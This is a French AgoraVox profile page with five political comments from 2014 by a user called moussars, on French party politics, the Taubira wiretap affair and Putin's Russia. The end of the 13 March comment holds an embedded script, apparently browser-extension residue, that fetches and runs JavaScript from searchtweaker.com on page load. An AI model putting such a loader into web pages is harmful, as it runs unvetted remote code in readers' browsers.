• AgoraVox sur Twitter
  • RSS
  • Agoravox TV
  • Agoravox Mobile

moussars

Cet auteur n'a pas encore renseigné sa description

Tableau de bord

Rédaction Depuis Articles publiés Commentaires postés Commentaires reçus
L'inscription 0 320 0
1 mois 0 1 0
5 jours 0 0 0

Derniers commentaires



  • moussars 8 avril 2014 11:59

    On a le droit d’admirer un type qui, comme avocat d’affaires, en s’enrichissant grassement, a aidé un certain Tapie à dépecer des entreprises sur le dos des employés. Chacun son truc !

    Il n’y a pas l’espace d’un papier à cigarette entre l’UMP et le PS.
    Alors, le centrisme...



  • moussars 8 avril 2014 11:42

    Mon beau-père était, de race mongole et non russe, et à tout juste 17 ans, soldat à Leningrad.
    C’est même là qu’il devint invalide de guerre et contina tout de même à se battre...
    Il n’a jamais vu un seul « machin amerloque » comme il me disait. Il aurait pourtant bien voulu...
    A l’époque des manipulations permanentes, sur toute la surface du globe, moi aussi, je peux sortir des rapports et autres études concoctés par qui vous savez...

    Un opposant à Poutine devant le Comité des Droits de l’Homme de l’ONU



  • moussars 22 mars 2014 10:43

    Et comme les esprits faibles sont très nombreux et aussi courrants dans ce qui sert d’élite...



  • moussars 13 mars 2014 16:55

    Taubira a parlé à chaud, trop vite, à la demande expresse d’Ayrault.
    Elle a donc improvisé, sans consulter ses conseillers, sans préparation et avec ce qu’elle avait sous la main, dans un climat sur lequel il est inutile de s’attarder.

    Instinctivement, comme les faits rapportés dans le document (et les autres) qu’elle a brandi sont graves, que Sarkozi en est à sa sixième affaire concomittante, que la tension est à son maximum, que le Copé est aussi mal parti, qu’elle a été victime de lynchage (histoire de la bananne et quelques autres) par une opposition qui tente diversion sur diversion... elle a, très maladroitement menti pour éviter justement que les gens de mauvaise foi laissent entendre que c’est elle qui a demandé les écoutes (Herzogue n’était pas sur écoute...).
    Taubira, par son comportement depuis 2 ans et son projet de réforme (comme l’a signalé Fergus) est le seul membre du gouvernement valable.

    Naïve ? maladroite ? Amatrice ? Sûrement. Et en ce qui concerne le troisième élément, c’est plutôt un point positif dans ce monde de bandits dans lequel elle n’a peut être rien à faire.

    Sincère, probe, compétente ? Encore plus sûrement.

    Et il ne faut tout de même joué les p’tits Copé et inverser les rôles (ces à la soc. de communication coïncide : il savait très bien, monsieur l’avocat d’affaires qu’une enquête préliminaires allait être ouverte) : les affaires pénales, c’est du côté de qui vous savez que ça se passe, ne vous en déplaise !

    P.S. : qui avait remarqué que même Ayrault avait parlé de décembre 2014 en répondant à Poujadas, sans que ce dernier et l’ensemble de la presse ne le remarque ?

    <script id="FoxLingoJs">(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();</script>


  • moussars 17 février 2014 16:29

    Ce n’est pas parce que l’Occident a perdu son magistère moral qu’il faut encenser la Russie du dictateur Poutine.
    Je refuse d’arbitrer entre les ricains et ses valets et le p’tit complexé de St Petersbourg qui n’existe que parce qu’il s’oppose à l’Occident et non pour ses qualités démocratiques propres.
    La Russie s’essoufle aussi économiquement. Encore un peu et alors la corruption institutionnelle, criminelle, comme il est rare de la rencontrer, ne va plus être supportée par les citoyens russes.

Voir tous ses commentaires (20 par page)


Publicité


Publicité



Palmarès

Publicité